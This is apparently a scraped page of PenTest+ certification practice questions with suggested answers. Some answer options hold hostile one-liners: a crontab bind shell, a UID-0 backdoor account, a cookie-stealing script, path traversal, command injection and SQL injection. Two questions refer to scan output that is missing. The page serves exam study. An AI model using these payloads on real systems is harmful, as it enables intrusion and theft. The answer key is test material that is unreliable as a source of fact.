CompTIA PT0-002 Practice Test - Questions Answers, Page 12

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
B. wmic startup get caption,command
C. crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
Suggested answer: A

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?

A. "cisco-ios" "admin+1234"
B. "cisco-ios" "no-password"
C. "cisco-ios" "default-passwords"
D. "cisco-ios" "last-modified"
Suggested answer: B

A tester who is performing a penetration test on a website receives the following output:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62

Which of the following commands can be used to further attack the website?

A. <script>var adr= '../evil.php?test=' + escape(document.cookie);</script>
B. ../../../../../../../../../../etc/passwd
C. /var/www/html/index.php;whoami
D. 1 UNION SELECT 1, DATABASE(),3--
Suggested answer: D

A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

Which of the following would be a recommendation for remediation?

A. Deploy a user training program
B. Implement a patch management plan
C. Utilize the secure software development life cycle
D. Configure access controls on each of the servers
Suggested answer: B

A company that develops embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

A. The reverse-engineering team may have a history of selling exploits to third parties.
B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
D. The reverse-engineering team will be given access to source code for analysis.
Suggested answer: A

A penetration tester has been given eight business hours to gain access to a client's financial system.

Which of the following techniques will have the highest likelihood of success?

A. Attempting to tailgate an employee going into the client's workplace
B. Dropping a malicious USB key with the company's logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management
Suggested answer: D

The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
B. This device is most likely a gateway with in-band management services.
C. This device is most likely a proxy server forwarding requests over TCP/443.
D. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
Suggested answer: B

Explanation:

The Heartbleed bug is an OpenSSL bug and does not affect SSH, so option A cannot follow from a service on TCP/22. Ref: https://www.sosberlin.com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh

Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

A. To provide feedback on the report structure and recommend improvements
B. To discuss the findings and dispute any false positives
C. To determine any processes that failed to meet expectations during the assessment
D. To ensure the penetration-testing team destroys all company data that was gathered during the test
Suggested answer: C

A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

A. Badge cloning
B. Dumpster diving
C. Tailgating
D. Shoulder surfing
Suggested answer: B

The results of an Nmap scan are as follows:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST
Nmap scan report for ( 10.2.1.22 )
Host is up (0.0102s latency).
Not shown: 998 filtered ports
Port State Service
80/tcp open http
|_http-title: 80F 22% RH 1009.1MB (text/html)
|_http-slowloris-check:
| VULNERABLE:
| Slowloris DoS Attack
| <..>
Device type: bridge|general purpose
Running (JUST GUESSING) : QEMU (95%)
OS CPE: cpe:/a:qemu:qemu
No exact OS matches found for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Which of the following device types will MOST likely have a similar response? (Choose two.)

A. Network device
B. Public-facing web server
C. Active Directory domain controller
D. IoT/embedded device
E. Exposed RDP
F. Print queue
Suggested answer: B, D

Explanation:

https://www.netscout.com/what-is-ddos/slowloris-attacks

From the http-title in the output (temperature, "RH" implying relative humidity, and a storage figure), this looks like an IoT sensor device that offers a web-based interface for visualizing its readings; the single open HTTP port and Slowloris susceptibility are also consistent with a public-facing web server.

Total 422 questions